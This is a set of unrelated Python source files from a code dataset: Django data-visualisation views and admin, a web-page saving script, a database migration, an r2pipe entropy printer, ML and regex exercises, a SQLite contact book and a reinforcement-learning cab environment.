None\n\tform = UsStateSelectForm()\n\ttitle=yaxis=None\n\tif request.method=='POST':\n\t\tform = UsStateSelectForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tstates = form.cleaned_data['name']\n\t\t\tstates_id = [ int(state.id) for state in states ]\n\t\t\tif (len(states_id)>0):\n\t\t\t\tdata = MortalityByStateYearly.objects.filter(state__id__in= states_id).values('state','year').select_related('state__name').annotate(value=Sum(variable))\t\n\t\t\t\tdata = data.filter(crude_rate__isnull=False ).order_by('state','year').values('state','state__name','year','value')\n\t\t\t\t\t\t\n\treturn render_to_response('visualization/linechart.html', {\n\t\t'data': data,\n\t\t'form':form,\n\t\t'state': state,\n\t\t'title': title,\n\t\t'subtitle': '',\n\t\t'yaxis':yaxis\n\t\t}, context_instance=RequestContext(request))\n\ndef kmeans_test(request):\n\tdata = None\n\tform = kmeansNumSamplesForm()\n\tk=None\n\tsample_size=None\n\tgrouped_data = None\n\tclusters = None\n\terror_list = None\n\tif request.method=='POST':\n\t\tform = kmeansNumSamplesForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tsample_size = int(form.cleaned_data['num_samples'])\n\t\t\tk = int(form.cleaned_data['k'])\n\t\t\t# Generate random data\n\t\t\tdata = numpy.random.random((sample_size, 2)) \n\t\t\t# Calculate kmeans\n\t\t\tif form.cleaned_data['method']=='Basic':\n\t\t\t\tgrouped_data, clusters, error_list = kmeans.kmeans(data,num_clusters=k, min_error=0.01, max_iter=100)\n\t\t\telse:\n\t\t\t\tgrouped_data, clusters, error_list = kmeans.bisecting_kmeans(data,k=k, min_error=0.01, max_iter=50)\n\treturn render_to_response('visualization/kmeans.html', {\n\t\t'data': grouped_data,\n\t\t'clusters': clusters,\n\t\t'error_list': error_list,\n\t\t'form':form,\n\t\t'k': k,\n\t\t'sample_size': sample_size,\n\t\t}, context_instance=RequestContext(request))\n#Return the year choices using minimum and maximum year from a model containing field year and state.\ndef get_year_choices(queryset,variable):\n\tnull_filter = {variable+'__isnull':False}\n\tmax_year = queryset.filter(**null_filter).aggregate(Max('year'))\n\tmin_year = queryset.filter(**null_filter).aggregate(Min('year'))\n\tyear_choices= [(i,i) for i in range(int(min_year['year__min']),int(max_year['year__max'])+1)]\n\tyear_choices = tuple(year_choices)\n\treturn year_choices\n\n# Responsible for returning the map for Unemployment, Natality, and Mortality.\ndef map_variable(request, variable,model):\n\tyear_choices = get_year_choices(model.objects,variable)\n\tform = YearlyMapAggregationForm(initial={'method':\"mean\"},year_choices=year_choices)\n\tmin_year = form.getMinYear()\n\tmax_year = form.getMaxYear()\n\tform.fields['starting_year'].initial = min_year\n\tform.fields['ending_year'].initial = max_year\n\tmethod='mean'\n\tlegend=''\n\tif request.method=='POST':\n\t\tform = YearlyMapAggregationForm(request.POST,year_choices=year_choices)\n\t\tif form.is_valid():\n\t\t\tif form.cleaned_data[\"starting_year\"]!='':\n\t\t\t\tmin_year = form.cleaned_data[\"starting_year\"]\n\t\t\tif form.cleaned_data[\"ending_year\"]!='': \n\t\t\t\tmax_year = form.cleaned_data[\"ending_year\"]\n\t\t\tmethod = form.cleaned_data[\"aggregation_method\"]\n\t\telse:\n\t\t\treturn render_to_response('visualization/map.html', {\n\t\t\t\t'data': None,\n\t\t\t\t'form':form,\n\t\t\t\t'title':\"Please check form errors\",\n\t\t\t\t}, context_instance=RequestContext(request))\n\t\t\n\tdata = model.objects.filter(year__gte=min_year,year__lte=max_year)\n\t# Remove null values from the query (happens in natality and mortality in birth rate and fertility rate)\n\t# Set title and legend upon variable to be plotted\n\tif variable == 'value':\n\t\tlegend=\"%\"\n\t\ttitle = \"Unemployed population (Yearly) [\"+method+\"]\"\n\t\tdataset='unemployment'\n\telif variable == 'num_births':\n\t\tdata = data.filter(num_births__isnull=False)\n\t\ttitle = \"Number of births (Yearly) [\"+method+\"]\"\n\t\tlegend='births'\n\t\tdataset='natality'\n\telif variable == 'birth_rate':\n\t\tdata = data.filter(birth_rate__isnull=False)\n\t\ttitle = \"Birth rate (Yearly) [\"+method+\"]\"\n\t\tlegend=' per 1000'\n\t\tdataset='natality'\n\telif variable == 'fertility_rate':\n\t\tdata = data.filter(fertility_rate__isnull=False)\n\t\ttitle = \"Fertility rate (Yearly) [\"+method+\"]\"\n\t\tlegend = \"per 1000\"\n\t\tdataset='natality'\n\telif variable == 'num_deaths':\n\t\tdata = data.filter(num_deaths__isnull=False)\n\t\ttitle = \"Deaths in the US (Yearly) [\"+method+\"]\"\n\t\tlegend = \"per 1000\"\n\t\tdataset='mortality'\n\telif variable == 'crude_rate':\n\t\tdata = data.filter(crude_rate__isnull=False)\n\t\ttitle = \"Crude rate (Yearly) [\"+method+\"]\"\n\t\tlegend = \"per 1000\"\n\t\tdataset='mortality'\n\telse:\n\t\traise Http404\n\tdata = data.select_related('state__code').values('state','state__code')\n\n\tif method=='mean':\n\t\tdata=data.annotate(value=Avg(variable))\n\telif method==\"min\":\n\t\tdata=data.annotate(value=Min(variable))\n\telif method==\"max\":\n\t\tdata=data.annotate(value=Max(variable))\n\telif method==\"sum\":\n\t\tdata=data.annotate(value=Sum(variable))\n\telse:\n\t\traise Http404\n\n\t# Get min and max value for display in highcharts\n\tmin_val = data.aggregate(Min('value'))['value__min']\n\tmax_val = data.aggregate(Max('value'))['value__max']\n\treturn render_to_response('visualization/map.html', {\n\t\t'data': data,\n\t\t'form':form,\n\t\t'title':title,\n\t\t'legend':legend,\n\t\t'min_val':min_val,\n\t\t'max_val':max_val,\n\t\t'dataset':dataset,\n\t\t'variable':variable\n\t\t}, context_instance=RequestContext(request))\n\n","sub_path":"visualization/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"626243193","text":"import requests\r\nimport os\r\nfrom bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\nimport time\r\n\r\n\r\nURL='http://h5.eqxiu.com/s/Cpmop6jW'\r\nUSERAGENT='Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/12.0 Mobile/15A372 Safari/604.1'\r\n\r\nSESSION=requests.Session()\r\nSESSION.headers={'User-Agent':USERAGENT}\r\n\r\nprofile = webdriver.FirefoxProfile()\r\nprofile.set_preference(\"general.useragent.override\", USERAGENT)\r\nDRIVER = webdriver.Firefox(firefox_profile=profile,executable_path='./geckodriver')\r\nDRIVER.set_window_size(480, 800)\r\n\r\n\r\n\r\npaths=URL.split('/')\r\n\r\nfor path in paths:\r\n if path !='':\r\n\r\n BASEPATH=path+'/'\r\n\r\ndef mk_dir(dir=''):\r\n try:\r\n os.mkdir(BASEPATH+dir)\r\n except Exception as e:\r\n # print(e)\r\n # print(str(e))\r\n pass\r\n\r\n\r\n\r\nclass Static:\r\n def __init__(self,tag):\r\n self.tag=tag\r\n self.old_tag_str=str(tag)\r\n self.new_tag_str=''\r\n self.url=''\r\n self.filetype=''\r\n self.type=''\r\n self.filename=''\r\n \r\n def save(self,name):\r\n print('-----------------SAVING-----------------')\r\n \r\n tag=self.tag\r\n try:\r\n self.url=tag['href']\r\n except KeyError:\r\n self.url=tag['src']\r\n except Exception as e:\r\n print(str(e))\r\n raise\r\n\r\n if self.url[:4] != 'http':\r\n self.url=URL + self.url\r\n\r\n \r\n try:\r\n r=SESSION.get(self.url)\r\n self.type=r.headers['Content-Type'].split('/')[0]\r\n if self.type == 'application':\r\n self.type= 'js'\r\n self.filetype='js'\r\n elif self.type == 'image':\r\n self.type= 'img'\r\n self.filetype=r.headers['Content-Type'].split('/')[1]\r\n elif self.type == 'text':\r\n self.filetype=r.headers['Content-Type'].split('/')[1]\r\n else:\r\n print(self.type)\r\n raise\r\n \r\n self.filename=name+'.'+self.filetype\r\n \r\n print('type:',self.type,'\\nfiletype',self.filetype,'\\nfilename',self.filename)\r\n \r\n mk_dir(self.type)\r\n \r\n with open(BASEPATH+self.type+'/'+self.filename,'wb',) as f:\r\n f.write(r.content)\r\n self.new_tag_str=self.old_tag_str.replace(self.url,self.type+'/'+self.filename)\r\n return True\r\n\r\n except Exception as e:\r\n print('ERROR IN FILE SAVEING')\r\n print(str(e))\r\n return False\r\n\r\n\r\nclass LocalStatic:\r\n def __init__(self,tag):\r\n self.tag=tag\r\n self.old_tag_str=str(tag)\r\n self.new_tag_str=''\r\n self.code=''\r\n self.type=''\r\n self.filename=''\r\n \r\n def fix(self,filename):\r\n tag=self.tag\r\n self.code=tag.text\r\n if tag.name=='script':\r\n self.type='js'\r\n elif tag.name=='style':\r\n self.type='css'\r\n else :\r\n print('UNKNOW INSTATIC TYPE')\r\n \r\n self.filename=filename+'.'+self.type\r\n\r\n # 创建类型路径\r\n mk_dir(self.type)\r\n \r\n\r\n def save(self):\r\n print('-----------------SAVING-----------------')\r\n try:\r\n print('type:',self.type,'\\nfilename',self.filename)\r\n # 保存文件\r\n with open(BASEPATH+self.type+'/'+self.filename,'w',) as f:\r\n f.write(self.code)\r\n # 将url指向文件\r\n if self.type == 'js':\r\n self.new_tag_str=''\r\n elif self.type == 'css':\r\n self.new_tag_str=''\r\n else:\r\n print('UNKNOW INSTATIC TYPE')\r\n\r\n return True\r\n\r\n except Exception as e:\r\n print(str(e))\r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n # print(BASEPATH)\r\n \r\n mk_dir()\r\n\r\n # r=SESSION.get(URL)\r\n # encode=r.apparent_encoding\r\n # # print(r.apparent_encoding)\r\n # r.encoding=encode\r\n # html=r.text\r\n\r\n DRIVER.get(URL)\r\n \r\n time.sleep(30)\r\n html=DRIVER.page_source\r\n DRIVER.quit()\r\n\r\n soup=BeautifulSoup(html,'html.parser')\r\n\r\n with open(BASEPATH + 'page_source_old.html','w',encoding='utf8') as f:\r\n f.write(str(soup))\r\n\r\n new_page_source=str(soup)\r\n\r\n # 获取文件标签\r\n tele_tags=[]\r\n local_tages=[]\r\n local_tages.extend( soup.find_all('style'))\r\n tele_tags.extend( soup.find_all('link'))\r\n tele_tags.extend( soup.find_all('img'))\r\n \r\n for tag in soup.find_all('script'):\r\n try:\r\n print(tag['src'])\r\n tele_tags.append(tag)\r\n except KeyError:\r\n tag.text\r\n local_tages.append(tag)\r\n except Exception as e:\r\n print('UNKNOW SCRIPT TYPE')\r\n print(str(e))\r\n raise\r\n \r\n\r\n # 操作远程文件\r\n n=0\r\n for tag in tele_tags:\r\n static=Static(tag)\r\n if static.save(str(n)):\r\n new_page_source=new_page_source.replace(static.old_tag_str,static.new_tag_str)\r\n n+=1\r\n \r\n # 操作本地文件\r\n for tag in local_tages:\r\n local_static=LocalStatic(tag)\r\n local_static.fix(str(n))\r\n if local_static.save():\r\n new_page_source=new_page_source.replace(local_static.old_tag_str,local_static.new_tag_str)\r\n n+=1\r\n\r\n # 插入控制脚本\r\n basejs='\\n\\n'\r\n new_page_source = new_page_source.replace('',basejs+'')\r\n addonjs='''\r\n \\n\r\n
\r\n 默认微信号\r\n 默认微信号客服名称\r\n 默认性别\r\n \r\n
\r\n \\n\r\n '''\r\n new_page_source = new_page_source.replace('',addonjs+'')\r\n\r\n # SAVE\r\n with open(BASEPATH+ 'page_source_new.html','w',encoding='utf8') as f:\r\n f.write(new_page_source)","sub_path":"go.py","file_name":"go.py","file_ext":"py","file_size_in_byte":6345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"312171389","text":"from sqlalchemy import create_engine, select\nfrom models import Base\n\nengine_lite = create_engine('sqlite:///mydb.sqlite')\nengine_cloud = create_engine('postgresql+psycopg2://USER:PW@/DBNAME?host=/cloudsql/INSTANCE')\n\nwith engine_lite.connect() as conn_lite:\n with engine_cloud.connect() as conn_cloud:\n for table in Base.metadata.sorted_tables:\n data = [dict(row) for row in conn_lite.execute(select(table.c))]\n conn_cloud.execute(table.insert().values(data))","sub_path":"week-010/importdb.py","file_name":"importdb.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"596906210","text":"from atomthemes.celery import celery_app\nimport logging\n\nfrom .readme import ReadmeReader\nfrom .models import Theme\n\nlogger = logging.getLogger(__name__)\n\n\n@celery_app.task\ndef discover_page(page):\n count = 0\n allowed_types = set(['syntax', 'ui'])\n for package_data in page.get_items():\n meta = package_data['metadata']\n theme_type = meta.get('theme')\n if theme_type and theme_type in allowed_types:\n logger.info('Found theme: ' + package_data['name'])\n theme_factory = ThemeFactory(package_data)\n theme_factory.save_to_db()\n count += 1\n return count\n\n\nclass ThemeFactory:\n def __init__(self, package_data):\n self.package_data = package_data\n\n def save_to_db(self):\n theme, created = Theme.objects.get_or_create(name=self.package_data['name'])\n current_version = self.package_data['releases']['latest']\n theme.stars = self.package_data['stargazers_count']\n theme.downloads = self.package_data['downloads']\n\n if created:\n theme.repository_url = self.package_data['repository']['url']\n theme.theme = self.package_data['metadata']['theme']\n\n if created or current_version != theme.version:\n theme.screenshot = self.extract_screenshot()\n theme.version = current_version\n\n theme.save()\n return theme\n\n def extract_screenshot(self):\n readme = ReadmeReader(self.package_data['readme'])\n return readme.get_screenshot()\n","sub_path":"atomthemes/packages/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"540120626","text":"import sys\nimport r2pipe\n\nif len(sys.argv) < 2 :\n print(\"Provide file path and optional block size!\")\n sys.exit()\n\nvisual = [\" \", \"+\", \"++\", \"+++\", \"++++\", \"+++++\", \"++++++\",\\\n \"+++++++\", \"++++++++\", \"+++++++++\", \"++++++++++\"]\n\nr2 = r2pipe.open(sys.argv[1])\nsize = int(r2.cmd('iZ'))\n\nblock_size = int(sys.argv[2], 16) if (len(sys.argv) > 2) else 0x0\n \nif (block_size > size) or (block_size == 0x0) :\n block_size = size\n\nnum_blocks = size // block_size\n\nr2.cmd('b '+ str(block_size))\nfor _ in range(num_blocks) :\n ent = r2.cmd('ph entropy')\n print(r2.cmd('s').replace(\"\\n\", \"\"))\n print(visual[int(float(ent))])\n print(ent)\n r2.cmd('s++')\n\n","sub_path":"scripts/print_entropy.py","file_name":"print_entropy.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"617584429","text":"\"\"\"\nRun multiple models on the Mnist data.\n\"\"\"\nimport argparse\nimport logging\nimport os\nimport json\n\nimport numpy as np\nimport pymc3 as pm\n\nimport models\nimport data\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_pred_clusters(model, samples, njobs):\n with model:\n trace = pm.sample(samples, njobs=njobs)\n pred_clusters = [np.argmax(np.bincount(zi)) for zi in trace['z'].T]\n return np.array(pred_clusters, int)\n\n\ndef save_config(config, exp_name):\n filename = os.path.expanduser(\"~/plot/mnist_{}_config.json\".format(\n exp_name))\n with open(filename, 'w') as fwrite:\n json.dump(config, fwrite)\n\n\ndef main():\n logging.basicConfig(level=logging.INFO)\n\n parser = argparse.ArgumentParser()\n # data\n parser.add_argument('--n-classes', type=int, default=10)\n parser.add_argument('--feat-std-min', type=float, default=0.1)\n # model\n parser.add_argument('--model-names', type=str, nargs='+')\n parser.add_argument('--n-comp', type=int, default=10)\n parser.add_argument('--n-trunc', type=int, default=30)\n parser.add_argument('--dp-alpha', type=float, default=1)\n parser.add_argument('--pcomp-dirichlet-dist-alpha', type=float, default=1)\n parser.add_argument('--pkw-beta-dist-alpha', type=float, default=1)\n parser.add_argument('--pkw-beta-dist-beta', type=float, default=1)\n parser.add_argument('--pkw-dirichlet-dist-alpha', type=float, default=1)\n # trace\n parser.add_argument('--samples', type=int, default=500)\n parser.add_argument('--njobs', type=int, default=1)\n # other\n parser.add_argument('--exp-name', type=str, default='A')\n args = parser.parse_args()\n logger.info(\"args=%s\", args)\n\n save_config(vars(args), args.exp_name)\n dataset = data.Mnist(args.n_classes, args.feat_std_min)\n for model_name, model in models.get_models(\n dataset.X_count, dataset.X_bin, vars(args)).items():\n if args.model_names is None or model_name in args.model_names:\n exp_name = \"{}_{}\".format(args.exp_name, model_name)\n pred_clusters = get_pred_clusters(model, args.samples, args.njobs)\n dataset.evaluate_clusters(pred_clusters, exp_name)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"run_mnist.py","file_name":"run_mnist.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"43913994","text":"import re\npattern1=\"y\"\nstring1 = \"http://yum.iqianyue.com\"\nresult1=re.match(pattern1, string1)\nresult11=re.search(pattern1, string1)\nprint(\"result1:\"+str(result1))\nprint(\"result11:\"+str(result11))\n\npattern2=\"\\n\"\nstring2='''http://yum.iqianyue.comhttp://baidu.com'''\nresult2=re.search(pattern2,string2)\nprint(result2)\n\npattern3='\\w\\dpython(\\w)'\nstring3='abcd3pythone'\nresult3=re.search(pattern3,string3)\nresult33=re.compile(pattern3).findall(string3)\nprint(result3)\nprint(result33)\n\npattern4=\"\\w\\dpython[xyz]\\w\"\npattern5=\"\\w\\dpython[^xyz]\\w\"\npattern6=\"\\w\\dpython[xyz]\\W\"\nstring4=\"abcdfphp345pythony_py\"\nresult4=re.search(pattern4,string4)\nresult5=re.search(pattern5,string4)\nresult6=re.search(pattern6,string4)\nprint(result4)\nprint(result5)\nprint(result6)\n\npattern7=\".python...\"\nstring7=\"abcdefgphp345pythony_py\"\nresult7=re.search(pattern7,string7)\nprint(result7)\n\nstring8=\"hellomypythonhispythonourpythonend\"\npattern8=re.compile(\".python.\")\nresult8=pattern8.findall(string8)\nprint(result8)\n\nstring9=\"hellomypythonhispythonourpythonend\"\npattern9=\"python.\"\nresult9=re.sub(pattern9,\"php\",string9)\nprint(result9)\n\nstring9=\"hellomypythonhispythonourpythonend\"\npattern9=\"python.\"\nresult9=re.sub(pattern9,\"php\",string9,2)\nprint(result9)\n\npattern10=\"[a-zA-Z]+://[^\\s]*[.com|.cn]\"\nstring10=\" baidu \"\nresult10=re.search(pattern10,string10)\nprint(result10)\n\npattern11=\"\\d{4}-\\d{7}|\\d{3}-\\d{8}\"\nstring11=\"021-382933568888sad\"\nresult11=re.search(pattern11,string11)\nprint(result11)\n\n\n\n\n","sub_path":"正则.py","file_name":"正则.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"515607024","text":"import sys\nimport time\n\nclass counter:\n def __init__(self, count, delay):\n self.Count = count\n self.Form = '%' + str(len(list(str(count))) + 2) + 's/'\n self.Num = int()\n self.LastTellTime = float()\n self.Now = float()\n self.Delay = float(delay)\n self.CountStepDelay = int()\n self.AllSpeed = list()\n self.AverageSpeed = float()\n \n def tell(self, text):\n string = self.Form % self.Num + str(self.Count) + ' ' + text + ' (' + self.averageSpeed() + ') [' + self.timeLeft() + '] '\n sys.stdout.write(string)\n sys.stdout.flush()\n sys.stdout.write('\\b' * len(string))\n #print(self.Num + '/' + str(self.Count) + ' ' + text, end=\"\")\n \n def step(self, text):\n self.Num += 1\n self.Now = time.time()\n if self.Now - self.LastTellTime < self.Delay:\n self.CountStepDelay += 1\n else:\n self.tell(text)\n self.LastTellTime = time.time()\n self.CountStepDelay = 0\n \n def lastTell(self, text):\n #self.LastTellTime = float()\n self.tell(text)\n print()\n\n def averageSpeed(self):\n if self.CountStepDelay > 0:\n try:\n value = float(self.CountStepDelay) / (self.Now - self.LastTellTime)\n except ZeroDivisionError:\n value = 666.0\n self.AllSpeed.append(value)\n self.AverageSpeed = sum(self.AllSpeed) / len(self.AllSpeed)\n \n return str(round(self.AverageSpeed, 1)) + '/sec'\n \n def timeLeft(self):\n count = self.Count - self.Num\n if count != 0 and self.AverageSpeed != 0:\n return time.strftime('%X', time.gmtime(count / self.AverageSpeed))\n elif count == 0 and self.AverageSpeed != 0:\n return time.strftime('%X', time.gmtime(self.Count / self.AverageSpeed))\n else:\n return '0'\n\n\n## Тестирование (при импорте не отрабатывает)\nif __name__ == \"__main__\":\n a = [1,2,3]\n counter = counter(len(a), 0.5)\n b = time.time()\n counter.step('Hello')\n time.sleep(0.9)\n counter.step('Hello')\n time.sleep(2)\n counter.step('Hello')\n time.sleep(2)\n counter.lastTell('Bye')\n print(time.time() - b)","sub_path":"modules/Counter.py","file_name":"Counter.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"615973667","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.contrib import admin\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.admin import UserAdmin\nfrom .models import *\n\n# Register your models here.\nfrom django.conf import settings\n\n#\n# class AbstractUserAdmin(BaseUserAdmin):\n# form = RegisterForm\n# add_form = RegisterForm\n# list_display = ('username', 'firstname', 'lastname', 'email', 'birth', 'gender', 'password',)\n# fieldsets = (\n# (None, {'fields': ('username', 'email', 'password', 'firstname', 'lastname', 'birth', 'gender', )}),\n# ('Personal info', {'fields': ()}),\n# )\n# list_filter = ('username',)\n# add_fieldsets = (\n# (None, {\n# 'classes': ('wide',),\n# 'fields': ('username', 'firstname', 'lastname', 'birth', 'email', 'gender', 'password1', 'password2')}\n# ),\n# )\n# filter_horizontal = ()\n# ordering = ('username', 'email', )\n\nclass ProfileInline(admin.StackedInline):\n model = Profile\n can_delete = False\n verbose_name_plural = 'web_users'\n\nclass CustomUserAdmin(UserAdmin):\n inlines = (ProfileInline,)\n\n\nadmin.site.unregister(User)\nadmin.site.register(User, CustomUserAdmin)\nadmin.site.register(Place)\nadmin.site.register(Activity)\nadmin.site.register(Expense)\nadmin.site.register(TravelGroup)\nadmin.site.register(Friendship)\nadmin.site.register(Message)\nadmin.site.register(Notification)\n# admin.site.register(AbstractUser, AbstractUserAdmin)\n","sub_path":"restful_app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"244623973","text":"import sqlite3\r\nbase = sqlite3.connect(\"contact_book.db\")\r\ncur = base.cursor()\r\ncur.execute(\"CREATE TABLE IF NOT EXISTS Contact (Name TEXT, Number TEXT)\")\r\n\r\nwhile True:\r\n print(\"Choose An Option- \")\r\n print(\"1/ Add Contact\")\r\n print(\"2/ Remove Contact\")\r\n print(\"3/ Edit Contact\")\r\n print(\"4/ See all contacts\")\r\n print(\"5/ Search contact\")\r\n print(\"6/ Exit\")\r\n ask = int(input(\"Input: \"))\r\n\r\n #option_1\r\n if ask == 1:\r\n print()\r\n while True:\r\n que_1_of_1 = input(\"Name: \").capitalize()\r\n que_2_of_1 = input(\"Number: \")\r\n cur.execute(\"INSERT INTO Contact (Name, Number) VALUES(?, ?)\", (que_1_of_1, que_2_of_1))\r\n base.commit()\r\n cur.execute(\"SELECT*FROM Contact\")\r\n all = cur.fetchall()\r\n if (que_1_of_1, que_2_of_1) in all:\r\n print()\r\n print(\"Operation Successfull\")\r\n print()\r\n else:\r\n print()\r\n print(\"Operation Unsuccessfull\")\r\n print()\r\n print(\"Do you want to add another contact? y/n\")\r\n que_3_of_1 = input()\r\n if que_3_of_1 == \"n\":\r\n print()\r\n break\r\n\r\n #option_2\r\n elif ask == 2:\r\n cur.execute(\"SELECT*FROM Contact\")\r\n all = cur.fetchall()\r\n if len(all) > 0:\r\n while True:\r\n print()\r\n cur.execute(\"SELECT*FROM Contact\")\r\n all = cur.fetchall()\r\n ii = 1\r\n for i in all:\r\n print(ii, i[0])\r\n ii = ii + 1\r\n que1_of_2 = int(input(\"Which contact you want to remove: \"))\r\n element = all[que1_of_2 - 1][1]\r\n cur.execute(\"DELETE FROM Contact WHERE Number = ?\", (element,))\r\n base.commit()\r\n if element not in all:\r\n print()\r\n print(\"Operation Successful\")\r\n else:\r\n print()\r\n print(\"Operation Unsccessful\")\r\n print()\r\n cur.execute(\"SELECT*FROM Contact\")\r\n all = cur.fetchall()\r\n if len(all) > 0:\r\n print(\"Do you want to remove more? y/n\")\r\n que2_of_2 = input()\r\n if que2_of_2 == \"n\":\r\n break\r\n else:\r\n break\r\n else:\r\n print()\r\n print(\"List Empty\")\r\n print()\r\n\r\n #option_3\r\n elif ask == 3:\r\n print()\r\n cur.execute(\"SELECT*FROM Contact ORDER BY NAME ASC\")\r\n all = cur.fetchall()\r\n if len(all) > 0:\r\n ii = 1\r\n for i in all:\r\n print(ii, i[0])\r\n ii = ii + 1\r\n else:\r\n print(\"The list is empty\")\r\n print()\r\n que_1_of_3 = int(input(\"Which contact you want to edit: \"))\r\n print()\r\n\r\n name = all[que_1_of_3-1][0]\r\n number = all[que_1_of_3-1][1]\r\n\r\n print(\"Name:\", name)\r\n print(\"Number:\", number)\r\n print()\r\n\r\n new_num = (input(\"New Number: \"))\r\n cur.execute(\"UPDATE Contact SET Number = ? WHERE Number = ?\", (new_num, number))\r\n base.commit()\r\n\r\n cur.execute(\"SELECT*FROM Contact ORDER BY NAME ASC\")\r\n all = cur.fetchall()\r\n print()\r\n if (name, new_num) in all:\r\n print(\"Operation Successful\")\r\n else:\r\n print(\"Operation Unsuccessful\")\r\n\r\n #option_4\r\n elif ask == 4:\r\n print()\r\n cur.execute(\"SELECT*FROM Contact ORDER BY NAME ASC\")\r\n all = cur.fetchall()\r\n if len(all) > 0:\r\n ii = 1\r\n for i in all:\r\n print(ii, i[0], '-', i[1])\r\n ii = ii + 1\r\n print(all)\r\n else:\r\n print(\"The list is empty\")\r\n print()\r\n\r\n #option 5\r\n elif ask == 5:\r\n search=input(\"Search: \")\r\n print()\r\n cur.execute(\"SELECT*FROM Contact WHERE NAME LIKE ? ORDER BY NAME\",(search+\"%\",))\r\n all = cur.fetchall()\r\n if len(all) > 0:\r\n ii = 1\r\n for i in all:\r\n print(ii, i[0], '-', i[1])\r\n ii = ii + 1\r\n else:\r\n print(\"The list is empty\")\r\n print()\r\n\r\n #option_6\r\n elif ask == 6:\r\n break\r\n\r\n else:\r\n print(\"please try again\")","sub_path":"contact book.py","file_name":"contact book.py","file_ext":"py","file_size_in_byte":4494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"600096943","text":"# Import routines\n\nimport numpy as np\nimport math\nimport random\nfrom sklearn import preprocessing\n\n# Defining hyperparameters\nm = 5 # number of cities, ranges from 1 ..... m\nt = 24 # number of hours, ranges from 0 .... t-1\nd = 7 # number of days, ranges from 0 ... d-1\nC = 5 # Per hour fuel and other costs\nR = 9 # per hour revenue from a passenger\n\n\nclass CabDriver():\n\n def __init__(self):\n \"\"\"initialise your state and define your action space and state space\"\"\"\n self.action_space = tuple([(pick_up,drop) for pick_up in (1,2,3,4,5) for drop in (1,2,3,4,5) if pick_up!=drop])\n self.state_space = [(loc, time, day) for loc in np.arange(1,m+1) for time in range(t) for day in range(d)]\n self.state_init = random.choice(self.state_space)\n self.state_input = (np.arange(1,m+1) , np.arange(0,t) , np.arange(0,d))\n # Start the first round\n self.reset()\n\n\n ## Encoding state (or state-action) for NN input\n\n def state_encod_arch1(self, state):\n \"\"\"convert the state into a vector so that it can be fed to the NN. This method converts a given state into a vector format. Hint: The vector is of size m + t + d.\"\"\"\n\n ohe = preprocessing.OneHotEncoder()\n location_vector = ohe.fit_transform(self.state_input[0].reshape(-1,1)).todense()[:,state[0]-1]\n time_vector = ohe.fit_transform(self.state_input[1].reshape(-1,1)).todense()[:,state[1]]\n day_vector = ohe.fit_transform(self.state_input[2].reshape(-1,1)).todense()[:,state[2]]\n \n state_encod = np.concatenate((location_vector,time_vector,day_vector),axis=0)\n return state_encod\n\n\n # Use this function if you are using architecture-2 \n # def state_encod_arch2(self, state, action):\n # \"\"\"convert the (state-action) into a vector so that it can be fed to the NN. This method converts a given state-action pair into a vector format. Hint: The vector is of size m + t + d + m + m.\"\"\"\n\n \n # return state_encod\n\n\n ## Getting number of requests\n\n def requests(self, state):\n \"\"\"Determining the number of requests basis the location. \n Use the table specified in the MDP and complete for rest of the locations\"\"\"\n location = state[0]\n if location == 1:\n requests = np.random.poisson(2)\n elif location == 2:\n requests = np.random.poisson(12)\n elif location == 3:\n requests = np.random.poisson(4)\n elif location == 4:\n requests = np.random.poisson(7)\n else:\n requests = np.random.poisson(8)\n\n if requests >15:\n requests =15\n\n possible_actions_index = random.sample(range(1, (m-1)*m +1), requests) # (0,0) is not considered as customer request\n actions = [self.action_space[i-1] for i in possible_actions_index]\n\n \n actions.append([0,0])\n\n return possible_actions_index,actions \n \n\n\n\n def reward_func(self, state, action, Time_matrix):\n \"\"\"Takes in state, action and Time-matrix and returns the reward\"\"\"\n if (action[0] == 0 and action[1] == 0):\n reward = -C\n else:\n reward = R * (Time_matrix[action[0]-1][action[1]-1][state[1]][state[2]]) - C * ((Time_matrix[action[0]-1][action[1]-1][state[1]][state[2]]) + (Time_matrix[state[0]-1][action[0]-1][state[1]][state[2]]))\n return reward\n\n\n\n\n def next_state_func(self, state, action, Time_matrix):\n \"\"\"Takes state and action as input and returns next state\"\"\"\n \n if (action[0] == 0 and action[1] == 0):\n idle_next_time = state[1] + 1\n if not ((state[2]+(idle_next_time // 24)) > 6):\n if (idle_next_time // 24 >= 1):\n next_state = (state[0], 0 , state[2] + 1)\n else:\n next_state = (state[0],idle_next_time, state[2])\n else:\n if(idle_next_time // 24 >= 1):\n next_state = (state[0], 0, 0) \n else:\n next_state = (state[0],idle_next_time, state[2])\n \n return next_state\n else:\n \n active_next_time = state[1] + 